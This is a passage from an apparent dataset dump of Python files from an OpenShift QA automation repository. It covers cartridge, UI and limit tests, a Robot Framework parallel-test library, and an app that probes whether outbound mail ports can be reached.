OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalMirrorsPython)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5467305779457092, "alphanum_fraction": 0.5580281019210815, "avg_line_length": 32.574710845947266, "blob_id": "e6d6fe49c7221385d163a8153cb6626b68559b70", "content_id": "9401d7efa511e8646c641fa8884832aa7445cfb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2921, "license_type": "no_license", "max_line_length": 141, "num_lines": 87, "path": "/automation/open/testmodules/RT/cartridge/scaling_min_gears.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n[US2282][BusinessIntegration] MIN_GEAR setting in cartridge [jbossas]\nhttps://tcms.engineering.redhat.com/case/173957/\n\"\"\"\n\nimport rhtest\nimport common\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = \"DEV\"\n\n def initialize(self):\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'php'\n self.app_name = common.getRandomString(10)\n self.summary = \"[US2282][BusinessIntegration] MIN_GEAR setting in cartridge\"\n\n \tcommon.env_setup()\n\n def finalize(self):\n self.change_descriptor(1)\n\nclass ScalingMinGears(OpenShiftTest):\n \n def change_descriptor(self, num = 1):\n ( ret_code, ret_output ) = common.run_remote_cmd_as_root(\n \"sed -i -e 's/Min: ./Min: %d/' /usr/libexec/openshift/cartridges/%s/info/manifest.yml\" % ( num, common.app_types[self.app_type] )\n )\n if self.get_run_mode() == \"OnPremise\":\n cmd=\"service openshift-broker restart\"\n else:\n cmd=\"service rhc-broker restart\"\n if ret_code == 0:\n ( ret_code, ret_output ) = common.run_remote_cmd_as_root(cmd)\n return ret_code\n\n def test_method(self):\n self.info(\"===============================\")\n self.info(\"1. Changing MIN_GEAR settings in the cartridge descriptor file\")\n self.info(\"===============================\")\n status = self.change_descriptor(3)\n self.assert_equal(status, 0, \"Error during manipulating with manifest.yml\")\n\n # Wait for rhc-broker to start\n time.sleep(15)\n \n self.info(\"===============================\")\n self.info(\"2. Creating a scalable application\")\n self.info(\"===============================\")\n status = common.create_app(self.app_name, common.app_types[self.app_type], scalable = True, clone_repo = False, timeout=360)\n self.assert_equal(status, 0, \"Unable to create an app\")\n \n self.info(\"===============================\")\n self.info(\"3. Checking the number of gears\")\n self.info(\"===============================\")\n ( gear_info, gear_count ) = self.config.rest_api.get_gears(self.app_name)\n self.assert_equal(gear_count, 4, \"Gear count must be 4\")\n \n self.info(\"===============================\")\n self.info(\"4. Scaling down\")\n self.info(\"===============================\")\n (status, resp) = self.config.rest_api.app_scale_down(self.app_name)\n self.assert_match(status, 'Unprocessable Entity', \"Scale-down operation must fail\")\n \n # Everything is OK\n return self.passed(self.summary)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingMinGears)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5659946799278259, "alphanum_fraction": 0.5785470008850098, "avg_line_length": 29.20689582824707, "blob_id": "65247d46928251e75e24bd5e74aea1c78f60851d", "content_id": "4af4f800ed976962bdbb0a2c188019452b3a7f99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2629, "license_type": "no_license", "max_line_length": 149, "num_lines": 87, "path": "/automation/open/testmodules/RT/cartridge/jboss_debug_port.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: jboss_debug_port.py\n# Date: 2012/02/13 07:02\n# Author: [email protected]\n#\n\nimport sys\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[US1614][Runtime][rhc-cartridge] Enable jboss debug port\"\n self.ftcms_testcase_id = 129218\n self.app_name = common.getRandomString(10)\n\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass JBossDebugPort(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a sample JBoss app\" ,\n common.create_app,\n function_parameters=[self.app_name,common.app_types['jbossas'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Enable jpda\",\n '''\n cd %s &&\n touch .openshift/markers/enable_jpda &&\n git add .openshift/markers/enable_jpda &&\n git commit . -m 'enable jboss debug' &&\n git push\n '''%(self.app_name),\n expect_return=0))\n\n pexpect_cmd = [\n ('sendline', 'jdb -attach $OPENSHIFT_INTERNAL_IP:8787'),\n ('expect', 'Initializing jdb'),\n ('expect', '>'),\n ('sendline', 'version'),\n ('expect', 'This is jdb version.*'),\n ('sendline', 'quit'),\n ('sendline', 'exit')]\n\n self.steps_list.append(testcase.TestCaseStep(\"connect app via rhcsh, or forward debug port via rhc-port-forward\",\n common.rhcsh,\n function_parameters = [self.app_name, pexpect_cmd],\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossDebugPort)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n# end of jboss_debug_port.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.637601375579834, "alphanum_fraction": 0.6509270071983337, "avg_line_length": 44.421051025390625, "blob_id": "c9b8258af54015731c68272157d67690b4c5e6fc", "content_id": "c292e92bfee01337a5822ab2bf5853c385e92ff9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3452, "license_type": "no_license", "max_line_length": 170, "num_lines": 76, "path": "/automation/open/testmodules/UI/web/US1797_135722.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "'''\n[US1797][UI][Account Management]Create domain from link in \"My Account\" page\n'''\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US17971357222(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=self.cfg.confirm_url_express\n\n \n def test_u_s17971357222(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n#domain shouldn't exist\n if (baseutils.has_domain(self)):\n time.sleep(10)\n raise Exception(\"The domain already exist\")\n\n baseutils.go_to_account_page(self)\n invalid = [(\"longerlongerlongerlonger\", u\"Namespace 'longerlongerlongerlonger' is too long. Maximum length is 16 characters.\") ]\n for t in invalid:\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(t[0])\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_id(self, \"domain_submit\")\n baseutils.assert_text_regexp_match_by_xpath(self, t[1],\"id('domain_name_group')/div/div[1]/p\")\n time.sleep(2)\n #zero string\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_id(self, \"domain_submit\")\n baseutils.assert_text_regexp_match_by_xpath(self, u\"This field is required.\", \"id('app-errors')/p\")\n\n for t in baseutils.Invalid_input:\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(t)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_equal_by_xpath(self, \"Only letters and numbers are allowed\",\"id('app-errors')/p\")\n time.sleep(2)\n##\n used_domain=self.cfg.exist_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(used_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_regexp_match_by_xpath(self, u\"Namespace '%s' is already in use. Please choose another.\"%used_domain, \"id('domain_name_group')/div/div[1]/p\")\n new_domain=baseutils.get_random_str(10)\n print \"DEBUG:\", new_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(new_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_link_text(self, \"Change your namespace...\")\n baseutils.assert_text_equal_by_xpath(self, \"http://applicationname\"+u\"\\u2013\"+\"%s.rhcloud.com\"%new_domain, \"id('content')/div[2]/div[1]/section[2]/div[1]\")\n \n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5923740863800049, "alphanum_fraction": 0.5964248180389404, "avg_line_length": 37.6224479675293, "blob_id": "49e20ab4fc78ebdf159b1c7e362e52d86e8904f7", "content_id": "1e59709188a81a059692eddebb630ad0f94395bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11356, "license_type": "no_license", "max_line_length": 160, "num_lines": 294, "path": "/automation/parallel/Parallel.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# Copyright 2008-2013 Nokia Siemens Networks Oyj\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom __future__ import with_statement\nimport subprocess\nimport time\nfrom random import randint\nimport os\nimport re\nimport sys\nfrom robot.libraries import BuiltIn\nfrom robot.utils import html_escape, ArgumentParser\nfrom robot.version import get_version\n\n\nclass Parallel(object):\n \"\"\"\n Library for executing tests in parallel from inside of a robot test case.\n Tests are executed in subprocesses.\n\n You can add arguments to all parallel test runs from `library importing`,\n for a set of parallel tests with `Add Arguments For Parallel Tests` and\n for an individual parallel test by passing the arguments in `Start Parallel Test`.\n\n The following command line arguments (also from argument files) are automatically\n passed to parallel tests:\n --loglevel, --runmode, --pythonpath, --variable, --variablefile\n\n Example:\n | *Settings* |\n | Library | Parallel | pybot |\n\n\n | *Test Cases* |\n | Runner |\n | | Run Parallel Tests | Hello | World |\n | Hello |\n | | [Tags] | parallel |\n | | Log | Hello ${WORLD} |\n | World |\n | | [Tags] | parallel |\n | | Log | ${HELLO} World |\n\n `pybot --exclude parallel --variable HELLO:Hello --variable WORLD:World .`\n \"\"\"\n\n def __init__(self, runner_script, *arguments):\n \"\"\"\n `runner_script` is pybot or jybot or a custom script.\n\n `arguments` are default arguments given to every test execution.\n\n Example:\n | Library | Parallel | pybot | --variable | variable:value | --loglevel | DEBUG |\n \"\"\"\n self._script = runner_script\n self._arguments = self._get_arguments(arguments)\n self._processes = []\n self._data_source = None\n\n def _get_arguments(self, additional_arguments):\n options,_ = ArgumentParser(_get_cmd_arguments()).parse_args(sys.argv[1:])\n args = []\n for arg in ['loglevel', 'runmode', 'variable', 'variablefile']:\n args += self._get_type_arguments(options, arg)\n args += list(additional_arguments)\n return args\n\n def _get_type_arguments(self, options, key):\n value = options[key]\n args = []\n if value is not None:\n if not isinstance(value, list):\n value = [value]\n for var in value:\n args += ['--%s' % key, var]\n return args\n\n def add_arguments_for_parallel_tests(self, *arguments):\n \"\"\"Adds `arguments` to be used when parallel test is started.\n\n `arguments` is a list of arguments to pass to parallel executions.\n\n In the following example variable my_var is used in both of the tests\n started with the keyword `Run Parallel Tests`:\n | Add Arguments For Parallel Tests | --variable | my_var:value |\n | Run Parallel Tests | Test | Another Test |\n \"\"\"\n self._arguments += list(arguments)\n\n def set_data_source_for_parallel_tests(self, data_source):\n \"\"\"Sets data source which is used when parallel tests are started.\n\n `data_source` is path to file which contains the test/tests which are\n started/executed with keywords `Start Parallel Test` or `Run Parallel\n Tests`.\n\n If tests to be executed are in the same suite and Robot Framework 2.5\n or later is used, there is no need to use this keyword as `data_source`\n can be automatically resolved.\n\n Examples:\n | Set Data Source For Parallel Tests | ${CURDIR}${/}my_parallel_suite.txt |\n | Start Parallel Test | My Parallel Test |\n | Wait All Parallel Tests |\n \"\"\"\n self._data_source = data_source\n\n def start_parallel_test(self, test_name, *arguments):\n \"\"\"Starts executing test with given `test_name` and `arguments`.\n\n `arguments` is a list of Robot Framework command line arguments passed to\n the started test execution. It should not include data source. Use\n `Set Data Source For Parallel Tests` keyword for setting the data\n source. Additional arguments can also be set in library import and with\n `Add Arguments For Parallel Tests` keyword.\n\n Returns a process object that represents this execution.\n\n Example:\n | Set Data Source For Parallel Tests | MySuite.txt |\n | Start Parallel Test | Test From My Suite |\n | Set Data Source For Parallel Tests | MyFriendsSuite.txt |\n | Start Parallel Test | Test From My Friends Suite |\n | Wait All Parallel Tests |\n \"\"\"\n if self._data_source is None:\n self._data_source = BuiltIn.BuiltIn().replace_variables('${SUITE_SOURCE}')\n process = _ParaRobo(test_name, self._data_source,\n self._arguments+list(arguments))\n process.run(self._script)\n self._processes.append(process)\n return process\n\n def run_parallel_tests(self, *test_names):\n \"\"\"Executes all given tests parallel and wait those to be ready.\n\n Arguments can be set with keyword `Add Arguments For Parallel Tests`\n and data source with keyword `Set Data Source For Parallel Tests`.\n\n Example:\n | Add Arguments For Parallel Tests | --variable | SOME_VARIABLE:someValue |\n | Set Data Source For Parallel Tests | MySuite.txt |\n | Run Parallel Tests | My Parallel Test | My Another Parallel Test |\n\n When the parallel tests are from different data sources see the example in `Start Parallel Test`.\n \"\"\"\n processes = []\n for name in test_names:\n processes += [self.start_parallel_test(name)]\n self.wait_parallel_tests(*processes)\n\n def wait_parallel_tests(self, *processes):\n \"\"\"Waits given `processes` to be ready and fails if any of the tests failed.\n\n `Processes` are list of test execution processes returned from keyword\n `Start Parallel Test`.\n\n Example\n | ${test 1}= | Start Parallel Test | First Test |\n | ${test 2}= | Start Parallel Test | Test That Runs All The Time |\n | Wait Parallel Tests | ${test 1} |\n | ${test 3}= | Start Parallel Test | Third Test |\n | Wait Parallel Tests | ${test 2} | ${test 3} |\n \"\"\"\n failed = []\n for process in processes:\n if process.wait() != 0:\n failed += [process.test]\n process.report()\n self._processes.remove(process)\n if failed:\n raise AssertionError(\"Following tests failed:\\n%s\" % \"\\n\".join(failed))\n\n def wait_all_parallel_tests(self):\n \"\"\"Wait all started test executions to be ready and fails if any of those failed.\"\"\"\n self.wait_parallel_tests(*self._processes)\n\n def stop_all_parallel_tests(self):\n \"\"\"Forcefully stops all the test executions.\n\n NOTE: Requires Python 2.6 or later.\n \"\"\"\n for process in self._processes:\n process.stop_test_execution()\n self._processes = []\n\n\nclass _ParaRobo(object):\n\n def __init__(self, test, data_source, arguments):\n self.test = test\n self._data_source = data_source\n self._args = arguments\n self._built_in = BuiltIn.BuiltIn()\n id = self._create_id()\n self._output = 'output_%s.xml' % id\n self._log = 'log_%s.html' % id\n self._output_dir = self._built_in.replace_variables(\"${OUTPUT DIR}\")\n self._monitor_out = os.path.join(self._output_dir, 'monitor_%s.txt' % id)\n\n @property\n def _suite_name(self):\n name = os.path.splitext(os.path.basename(self._data_source))[0]\n name = name.split('__', 1)[-1] # Strip possible prefix\n name = name.replace('_', ' ').strip()\n if name.islower():\n name = name.title()\n return name\n\n def _create_id(self):\n return \"%s_%s\" % (randint(0, 10000), time.strftime('%Y%m%d_%H%m%S.')+\\\n ('%03d' % (int(time.time()*1000) % 1000)))\n\n def run(self, script):\n self._monitor_file = open(self._monitor_out, 'w')\n cmd = [script,\n '--outputdir', self._output_dir,\n '--output', self._output,\n '--report', 'None',\n '--log', self._log,\n '--monitorcolors', 'off',\n '--test', self.test]+\\\n self._args + [self._data_source]\n print \"Starting test execution: %s\" % \" \".join(cmd)\n self._process = subprocess.Popen(cmd,\n shell=os.sep == '\\\\',\n stdout=self._monitor_file,\n stderr=self._monitor_file,\n env=self._get_environment_variables())\n\n def _get_environment_variables(self):\n environment_variables = os.environ.copy()\n if environment_variables.has_key(\"ROBOT_SYSLOG_FILE\"):\n del(environment_variables[\"ROBOT_SYSLOG_FILE\"])\n return environment_variables\n\n def wait(self):\n rc = self._process.wait()\n self._monitor_file.close()\n return rc\n\n def report(self):\n with open(self._monitor_out, 'r') as monitor_file:\n monitor_output = monitor_file.read()\n try:\n os.remove(self._monitor_out)\n except:\n pass\n match = re.search('^Log: (.*)$', monitor_output, re.MULTILINE)\n monitor_output = self._replace_stdout_log_message_levels(monitor_output)\n monitor_output = html_escape(monitor_output)\n if match:\n monitor_output = monitor_output.replace(match.group(1), '<a href=\"%s#test_%s.%s\">%s</a>' % (self._log, self._suite_name, self.test, match.group(1)))\n monitor_output = self._add_colours(monitor_output)\n print \"*HTML* %s\" % monitor_output\n\n def _replace_stdout_log_message_levels(self, output):\n for level in ['TRACE', 'WARN', 'DEBUG', 'INFO', 'HTML']:\n output = output.replace('\\n*%s*' % level, '\\n *%s*' % level)\n return output\n\n def _add_colours(self, output):\n for name, colour in [(\"PASS\", \"pass\"), (\"FAIL\", \"fail\"), (\"ERROR\", \"fail\")]:\n output = output.replace(' %s ' % name, ' <span class=\"%s\">%s</span> ' % (colour, name))\n return output\n\n def stop_test_execution(self):\n try:\n self._process.terminate()\n except AttributeError:\n pass\n self.report()\n\n\ndef _get_cmd_arguments():\n import robot\n runner_path = os.path.join(os.path.dirname(os.path.abspath(robot.__file__)),\n 'run.py')\n with open(runner_path, 'r') as runner_file:\n runner_content = runner_file.read()\n return re.search('\"\"\"(.+)\"\"\"', runner_content, re.DOTALL).groups()[0]\n\n" }, { "alpha_fraction": 0.5870253443717957, "alphanum_fraction": 0.6007384061813354, "avg_line_length": 29.079364776611328, "blob_id": "80d9f4437d3c88404c6054215857878c475bad07", "content_id": "09177767c662f3cb3e77e0570eb576f5fc2c50f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 109, "num_lines": 63, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_java.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1309][rhc-cartridge]Create local lib mirrors for Java framework\nhttps://tcms.engineering.redhat.com/case/122394/\n\"\"\"\nimport os\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1309][rhc-cartridge]Create local lib mirrors for Java framework\")\n common.env_setup()\n self.app = { 'name' : common.getRandomString(7), \n 'type' : common.app_types['jbossas'] }\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app['name']))\n os.system(\"rm -rf kitchensink-example\")\n\n\nclass LocalLibMirrorsJava(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\"Get jbossas-quickstart codes\",\n \"rm -rf kitchensink-example; git clone https://github.com/openshift/kitchensink-example.git\",\n expect_return = 0)\n\n self.add_step(\"Git push codes\",\n \"cd %s && cp -rf ../kitchensink-example/* . && git add . && git commit -am test && git push\" \n % self.app['name'],\n expect_str = ['BUILD SUCCESS', 'Downloaded: http.*nexus'],\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalLibMirrorsJava)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5927679538726807, "alphanum_fraction": 0.5996556282043457, "avg_line_length": 35.2890625, "blob_id": "17069558995ca34d9faa0395cb8962996db50871", "content_id": "bb8eacf1279859a089534c3d73900231725a78bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4646, "license_type": "no_license", "max_line_length": 200, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_rack.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to RACK application\nhttps://tcms.engineering.redhat.com/case/122452/?from_plan=4962\n\"\"\"\nimport os\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an RACK application\"\n try:\n variant = self.get_variant()\n except:\n variant = 'ruby'\n self.app_type = common.app_types[variant]\n self.app_name = \"ruby4mysql\"+common.getRandomString(4)\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n self.info(\"VARIANT: %s\"%variant)\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToRack(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a RACK app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"The app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters = [ self.app_name, \"add-%s\" %self.mysql_v],\n expect_description=\"The mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def mod_config_ru(self):\n cmd = \"\"\"cd %s && cat <<'EOF' >>config.ru &&\nrequire 'mysql'\nmap '/mysql' do\n content = \"\"\n begin\n dbh = Mysql.real_connect(ENV['OPENSHIFT_MYSQL_DB_HOST'], ENV['OPENSHIFT_MYSQL_DB_USERNAME'], ENV['OPENSHIFT_MYSQL_DB_PASSWORD'], ENV['OPENSHIFT_APP_NAME'], Integer(ENV['OPENSHIFT_MYSQL_DB_PORT']))\n dbh.query(\"DROP TABLE IF EXISTS ucctalk\")\n dbh.query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n dbh.query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n content += \"<p>#{dbh.affected_rows} rows were inserted:</p>\"\n res = dbh.query(\"SELECT * FROM ucctalk\")\n while row = res.fetch_row do\n content += row.join(\", \")+\"<br>\"\n end\n res.free\n rescue MysqlError => e\n content += \"Error code: #{e.errno}\"\n content += \"Error message: #{e.error}\"\n ensure\n dbh.close if dbh\n end\n mysql = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [content]]\n end\n run mysql\nend\nEOF\ngit commit -m \"changes\" -a && git push\"\"\"%self.app_name\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Modify config.ru for accepting /mysql\",\n mod_config_ru,\n function_parameters=[self],\n expect_description=\"The modifications should be done without errros\",\n expect_return=0))\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql\", 'Jeremy')\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n verify,\n function_parameters=[self],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters = [ self.app_name, \"remove-%s\" %self.mysql_v],\n expect_description=\"The mysql should be removed successfully\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToRack)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.501467227935791, "alphanum_fraction": 0.512226939201355, "avg_line_length": 34.252872467041016, "blob_id": "ae28a43b7efda73e7e2eb0c479bce89ff4d2754d", "content_id": "79e50ec8cdb713f36449aed3339131079ab59f80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3067, "license_type": "no_license", "max_line_length": 113, "num_lines": 87, "path": "/automation/open/testmodules/RT/limits/app_template/outbound_mail_port/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \nimport socket\nimport select\n\ndef application(environ, start_response):\n\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/scan':\n hostlist=( \n \"127.0.0.1\", \"imap.gmail.com\", \"smtp.gmail.com\", \n \"smtp.mail.yahoo.com\", \"pop.mail.yahoo.com\"\n )\n portlist=(\n \"imap\", \"imap3\", \"imaps\", \"pop2\", \"pop3\", \"pop3s\", \n \"submission\", \"smtp\", \"smtps\"\n )\n\n sockets=dict()\n poller=select.epoll()\n response_body=\"\"\n for host in hostlist:\n for port in portlist:\n try:\n hent = socket.getaddrinfo(host, port)[0][4]\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setblocking(False)\n poller.register(sock.fileno())\n sockets[sock.fileno()]=[sock, host, port]\n sock.connect_ex(hent)\n except Exception, e:\n response_body+=\"%s:%s exception: %s\\n\" % (host, port, str(e))\n\n while sockets:\n events = poller.poll(5)\n if events:\n for fileno, event in events:\n poller.unregister(fileno)\n e=sockets[fileno][0].getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)\n if e == 0:\n response_body+=\"%s:%s Connected\\n\" % (sockets[fileno][1],\n sockets[fileno][2])\n else:\n response_body+=\"%s:%s Refused\\n\" % (sockets[fileno][1],\n sockets[fileno][2]) \n sockets[fileno][0].close()\n del(sockets[fileno])\n else:\n break\n \n for sock in sockets:\n sockets[sock][0].close()\n response_body+=\"%s:%s Timed Out\\n\" % (sockets[sock][1], sockets[sock][2])\n\n poller.close()\n\n else:\n response_body = 'OpenShift'\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.6719924807548523, "alphanum_fraction": 0.6757518649101257, "avg_line_length": 18.703702926635742, "blob_id": "557b6111edfc458edfd9a9fe8d3e6586f1cc7947", "content_id": "1b811b21f4503d4ae048a169c6894052eb78adaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1064, "license_type": "no_license", "max_line_length": 76, "num_lines": 54, "path": "/automation/open/testmodules/Collections/Demo/Demo02.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\ndemo test script for running variants\n\n\"\"\"\nimport rhtest\nimport database\nimport time\nimport os\n\n#from lib import testcase, common, OSConf\nimport openshift\nimport common\nimport testcase\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.rest = self.config.rest\n common.env_setup()\n\ndef finalize(self):\n pass\n\n\nclass Demo02(OpenShiftTest):\n def test_method(self):\n\n for variant in self.config.test_variants['variants']:\n self.app_type = common.app_types[variant]\n #\n status, res = self.rest.app_create(self.app_name, self.app_type)\n\n\n return self.failed(\"test failed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demo02)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 